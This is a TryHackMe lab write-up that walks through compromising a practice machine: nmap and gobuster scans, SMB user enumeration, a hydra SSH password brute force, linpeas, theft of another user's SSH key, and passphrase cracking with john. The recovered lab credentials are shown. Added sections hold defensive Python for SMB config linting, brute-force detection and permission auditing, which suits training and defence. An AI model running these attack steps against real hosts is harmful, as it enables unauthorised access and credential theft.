TryHackMe: Basic Pentesting
It's my first challenge, let's do it! I'm following the video and pausing to try solving it my own way.
Ok, I'm stuck: I don't know how to connect the attacker's machine to the target's machine. Target's IP: 10.10.126.255. Oh, I don't need to connect to the attacker's machine yet, I just need to run nmap:
root@ip-10-10-192-252:~/Desktop# nmap -sC -sV -oN nmap/initial 10.10.126.255
Ports open:
22
80
139
445
8009
8080
There's a website running on port 80, let's see what's there! Oh, how do I access a website from the terminal? I have it noted somewhere, can't find it… maybe it's wget? It's not!! Should be curl (I won't search the Internet, only using my notes). Worked. ez.
root@ip-10-10-192-252:~/Desktop# curl 10.10.126.255
<html>
<h1>Undergoing maintenance</h1>
<h4>Please check back later</h4>
<!-- Check our dev note section if you need to know what to work on. -->
</html>
(btw, wget followed by cat also worked, but I didn't want to download it)
Following the video, it says to use gobuster to brute-force the directories. Ok, but I don't have the wordlist…
Gobuster is an aggressive scan. It's noisy and gets noticed. Only use it against systems you have permission to scan.
Ok, I'll need the Internet (Grok) now… GoBuster Tutorial WordList. GUESS WHAT!? The THM machine already had a wordlist; I just looked around the CLI, changing directories… and found a lot of wordlists.
root@ip-10-10-192-252:~/Desktop/Tools/wordlists# ls
dirb fasttrack.txt PythonForPentesters SecLists
dirbuster MetasploitRoom rockyou.txt
Found the same wordlist as the one used in the video:
directory-list-2.3-medium.txt
root@ip-10-10-192-252:~/Desktop# gobuster dir -w /root/Desktop/Tools/wordlists/SecLists//Discovery/Web-Content/directory-list-2.3-medium.txt -u 10.10.126.255
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 320] [--> http://10.10.126.255/development/]
/server-status (Status: 403) [Size: 301]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
Stuck on how to do Linux enumeration; clicked on Hint and was told to use “SMB”, let's find it! Command not found. Internet time, found it: How to Enumerate SMB with Enum4linux & Smbclient. Discovered some stuff: SMB is a protocol, and Unix systems use SMB through Samba! I saw Samba was running but didn't know what it was, now I have a clue! SMB usually works on ports 139 and 445, and we have both open!
“Enum4linux is a tool used to enumerate SMB shares on both Windows and Linux systems.”
root@ip-10-10-192-252:~/Desktop/Tools# enum4linux -U 10.10.126.255
Did not return useful information, so let's try:
root@ip-10-10-192-252:~/Desktop/Tools# enum4linux -a 10.10.126.255
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
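Side note from the defender's chair, added here and not part of the original writeup: the user list above came out of an anonymous (null-session) bind, and that is governed by a few smb.conf settings. Below is an added Python check that reads two constructed smb.conf fragments (a permissive one resembling a stock distro layout, and a hardened one) and reports the settings that let unauthenticated clients in. The fragments, paths and share names are made up for the example; the option names (map to guest, restrict anonymous, guest ok, public) are real Samba parameters, but exactly what each blocks depends on the Samba version, so treat the check as a static lint, not a guarantee.

```python
import configparser

# Constructed smb.conf fragments (not the room's real config). The first
# resembles a stock Ubuntu layout that lets an anonymous (null-session)
# client bind to IPC$ and enumerate users; the second closes that door.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   security = user
   map to guest = bad user

[anonymous]
   path = /srv/samba/anonymous
   guest ok = yes
   browseable = yes
"""

HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = file server
   security = user
   map to guest = never
   restrict anonymous = 2

[shared]
   path = /srv/samba/shared
   guest ok = no
   valid users = @staff
   browseable = no
"""

TRUE_VALUES = ("yes", "true", "1")


def load_smb_conf(text):
    """Parse smb.conf text. Samba's syntax is INI-like, so configparser is
    enough for a static check; it does not expand Samba parameter synonyms."""
    cfg = configparser.ConfigParser(
        interpolation=None, strict=False, delimiters=("=",),
        empty_lines_in_values=False,
    )
    cfg.read_string(text)
    return cfg


def check_smb_conf(text):
    """Return (section, problem) pairs for settings that allow anonymous access."""
    cfg = load_smb_conf(text)
    findings = []
    g = cfg["global"] if cfg.has_section("global") else {}
    # Samba's built-in default for "map to guest" is never; distro configs often relax it.
    if g.get("map to guest", "never").strip().lower() != "never":
        findings.append(("global", "map to guest lets failed logins fall back to the guest account"))
    # restrict anonymous = 1 refuses anonymous SAMR/LSA access, 2 also refuses anonymous IPC$.
    if g.get("restrict anonymous", "0").strip() not in ("1", "2"):
        findings.append(("global", "restrict anonymous unset: null sessions may enumerate users and shares"))
    for section in cfg.sections():
        if section == "global":
            continue
        s = cfg[section]
        # "public" is Samba's synonym for "guest ok"
        guest = s.get("guest ok", s.get("public", "no")).strip().lower()
        if guest in TRUE_VALUES:
            findings.append((section, "guest ok = yes: share reachable without credentials"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, check_smb_conf(conf) or "no findings")
```

Running it reports three findings for the permissive fragment and none for the hardened one; on a real host you would feed it the output of `testparm -s` so that included files and defaults are already resolved.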
Here we go!
root@ip-10-10-192-252:~/Desktop/Tools# hydra -l jan -P /root/Desktop/Tools/wordlists/rockyou.txt ssh://10.10.126.255
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-07 18:00:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.126.255:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344222 to do in 1358:22h, 16 active
[STATUS] 133.00 tries/min, 399 tries in 00:03h, 14343999 to do in 1797:30h, 16 active
[22][ssh] host: 10.10.126.255 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
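What the hydra run above looks like from the target's side: every guess lands in the sshd auth log as a "Failed password" line from the same source within seconds, and the one that works shows up as "Accepted password" right behind them. Below is an added Python detector (not part of the original writeup) that parses constructed sample auth.log lines in Ubuntu's syslog format, counts failures per source in a sliding window, and raises the severity when a login succeeds while the burst is still in the window. The log lines, hostname, PIDs and the second source address are made up for the example.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed sample lines in the syslog format sshd writes to
# /var/log/auth.log on Ubuntu. The source address is the attack box from this
# writeup; the burst of failures within a few seconds is what a parallel
# hydra run looks like on the target side. Not a real captured log.
SAMPLE_AUTH_LOG = """\
Mar  7 18:00:29 basic2 sshd[1201]: Failed password for jan from 10.10.192.252 port 40122 ssh2
Mar  7 18:00:29 basic2 sshd[1202]: Failed password for jan from 10.10.192.252 port 40124 ssh2
Mar  7 18:00:30 basic2 sshd[1203]: Failed password for jan from 10.10.192.252 port 40126 ssh2
Mar  7 18:00:30 basic2 sshd[1204]: Failed password for invalid user admin from 10.10.192.252 port 40128 ssh2
Mar  7 18:00:31 basic2 sshd[1205]: Failed password for jan from 10.10.192.252 port 40130 ssh2
Mar  7 18:00:31 basic2 sshd[1206]: Failed password for jan from 10.10.192.252 port 40132 ssh2
Mar  7 18:00:32 basic2 sshd[1207]: Accepted password for jan from 10.10.192.252 port 40134 ssh2
Mar  7 18:05:10 basic2 sshd[1300]: Failed password for kay from 10.10.50.7 port 51000 ssh2
Mar  7 18:09:44 basic2 sshd[1301]: Accepted publickey for kay from 10.10.50.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_auth_log(text):
    """Return (timestamp, result, user, source_ip) for each sshd auth line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog omits the year
            events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed logins inside a sliding window.

    Returns {src: {"failures": total_failures, "users": [...],
                   "success_after_burst": bool}}; success_after_burst is the
    high-severity case: a login succeeded while the burst was still in the window.
    """
    alerts = {}
    total_failed = Counter()
    recent = defaultdict(deque)  # src -> (timestamp, user) of failures inside the window
    for ts, result, user, src in parse_auth_log(text):
        q = recent[src]
        while q and (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()  # expire failures that fell out of the window
        if result == "Failed":
            total_failed[src] += 1
            q.append((ts, user))
            if len(q) >= threshold:
                a = alerts.setdefault(src, {"users": set(), "success_after_burst": False})
                a["users"].update(u for _, u in q)
        elif src in alerts and q:
            alerts[src]["success_after_burst"] = True
            alerts[src]["users"].add(user)
    for src, a in alerts.items():
        a["failures"] = total_failed[src]
        a["users"] = sorted(a["users"])
    return alerts


if __name__ == "__main__":
    for src, a in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(src, a)
```

The single failure from the second address never crosses the threshold, so it stays quiet; the first address trips the alert on its fifth failure and gets marked success_after_burst when the accepted login follows. Rate-limiting tools like fail2ban implement the same idea as a response rather than just an alert.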
jan:armando. Now I logged in via SSH, used cd .. and accessed kay's directory, but got access denied when trying to cat the files. So I need to escalate privileges. https://github.com/Keartland/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/README.md
Oh, I forgot the THM machine doesn't have an Internet connection, so I looked back at the folders and found: /root/Desktop/Additional Tools/PEAS/linPEAS/linpeas.sh. Let's follow the video and copy this file to Jan's machine using scp:
scp /root/Desktop/Additional Tools/PEAS/linPEAS/linpeas.sh jan@10.10.126.255:/dev/shm
(shm = shared memory)
jan@basic2:/dev/shm$ chmod +x linpeas.sh
jan@basic2:/dev/shm$ ./linpeas.sh | tee linlog.txt
less -r /dev/shm/linpeas.txt (read with colors)
Ok, the file doesn't look complete and I can't scroll up to see all the content. Actually 'cat linlog.txt' seems not to be working, some mad stuff happened! The terminal got craaazzzzy after I tried to use less, cat and more to read the full file o.O
Ok, I closed the terminal and started again:
scp /root/Desktop/Additional\ Tools/PEAS/linPEAS/linpeas.sh jan@10.10.126.255:/dev/shm
chmod +x linpeas.sh
With nano it opened kind of broken, but it opened. Stuck for 30m+. Couldn't find the answer so… I'll try to SSH via VPN.
~Break of 2 hours
Yeah, with the VPN it worked out!
jan@basic2:/dev/shm$ ./linpeas_linux_amd64 | tee linlog.txt
══╣ Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
Kay's SSH key was found, let's access it. In Kay's home dir:
ls -la
cd .ssh
cat id_rsa
Saved id_rsa to a file on my computer:
chmod 600 kay_id_rsa
└─$ ssh -i kay_id_rsa kay@10.10.103.97
Oh, the SSH key has a passphrase! Let's find it out with John The Ripper. On Kali Linux:
john kay_id_rsa
F, I used the wrong John! I need to use ssh2john.
ssh2john kay_id_rsa > forjohn.txt
└─$ john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Found the passphrase: beeswax (kay_id_rsa)
└─$ ssh -i kay_id_rsa kay@10.10.103.97
passphrase: beeswax
Now I have access to pass.bak: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
GG! Learned a lot, was really fun!
Tools used: Nmap, Gobuster, enum4linux, Hydra, John The Ripper
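Defender's postscript, added here and not part of the original writeup. Everything after the jan login rode on file permissions: another user could read kay's id_rsa, the key's passphrase was in rockyou, and pass.bak was readable too. The added Python audit below walks a constructed stand-in for a home directory and reports exactly those conditions: a home or .ssh directory other users can enter, a private key file that is not owner-only or carries no passphrase (it reads the cipher field of the openssh-key-v1 header, or the Proc-Type line of legacy PEM keys), and a backup or password-looking file that is world-readable. The sample keys contain only the header fields, no real key material, and the file names, modes and placeholder contents are constructed for the example. It cannot judge passphrase strength; that part is a policy question.

```python
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(b):
    """SSH wire-format string: uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def openssh_cipher(blob):
    """Cipher name recorded at the start of an openssh-key-v1 blob ('none' =
    stored in the clear); None if the blob is not in that format."""
    if not blob.startswith(MAGIC):
        return None
    off = len(MAGIC)
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n].decode("ascii", "replace")


def key_is_encrypted(text):
    """True when the private key file needs a passphrase before it can be used."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(ln for ln in text.splitlines() if not ln.startswith("-----"))
        return openssh_cipher(base64.b64decode(body)) not in (None, "none")
    # Legacy PEM keys (BEGIN RSA PRIVATE KEY ...) mark encryption with a header line
    return "Proc-Type: 4,ENCRYPTED" in text


def audit_home(home):
    """Walk one home directory and report the exposures this writeup ran into:
    a home/.ssh tree other users can enter, a private key that is not owner-only
    or has no passphrase, and a backup/password-looking file that is world-readable."""
    home = Path(home)
    findings = []
    for path in [home, *home.rglob("*")]:
        rel = path.relative_to(home).as_posix()  # "." for the home dir itself
        mode = stat.S_IMODE(path.lstat().st_mode)
        if path.is_dir():
            if rel in (".", ".ssh") and mode & 0o077:
                findings.append((rel, "directory accessible by other users", mode))
            continue
        if not path.is_file():
            continue
        text = path.read_bytes().decode("ascii", "replace")
        if "PRIVATE KEY-----" in text:
            if mode & 0o077:
                findings.append((rel, "private key not restricted to owner", mode))
            if not key_is_encrypted(text):
                findings.append((rel, "private key stored without a passphrase", mode))
        elif path.suffix in (".bak", ".old") or "pass" in path.name.lower():
            if mode & stat.S_IROTH:
                findings.append((rel, "credential-looking file is world-readable", mode))
    return sorted(findings)


def _fake_openssh_key(cipher):
    """Constructed openssh-key-v1 armor carrying only the header fields the
    checker reads (cipher, kdf, kdf options, key count); no real key material."""
    kdf = b"none" if cipher == "none" else b"bcrypt"
    blob = (MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf)
            + _ssh_string(b"") + struct.pack(">I", 1)
            + _ssh_string(b"") + _ssh_string(b""))
    b64 = base64.b64encode(blob).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def build_sample_home():
    """Constructed stand-in for a home dir laid out the way the writeup found
    kay's, plus one correctly protected key, created in a temp dir."""
    home = Path(tempfile.mkdtemp(prefix="sample-home-"))
    ssh = home / ".ssh"
    ssh.mkdir()
    files = {
        ssh / "id_rsa": (_fake_openssh_key("aes256-ctr"), 0o644),     # passphrase, but readable by all
        ssh / "id_dsa_old": (_fake_openssh_key("none"), 0o600),       # owner-only, but no passphrase
        ssh / "id_ed25519": (_fake_openssh_key("aes256-ctr"), 0o600),  # the clean case
        home / "pass.bak": ("PLACEHOLDER-NOT-A-REAL-PASSWORD\n", 0o644),  # constructed stand-in
    }
    for path, (content, mode) in files.items():
        path.write_text(content)
        os.chmod(path, mode)
    os.chmod(home, 0o755)
    os.chmod(ssh, 0o755)
    return home


if __name__ == "__main__":
    for rel, issue, mode in audit_home(build_sample_home()):
        print(f"{rel:20} {mode:04o}  {issue}")
```

The fix for each finding is the usual one: home directories 0750 or tighter, .ssh at 0700 with keys at 0600, a passphrase on every stored key, and no credential backups sitting in a home directory at all. Point audit_home at real home directories to sweep a host.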


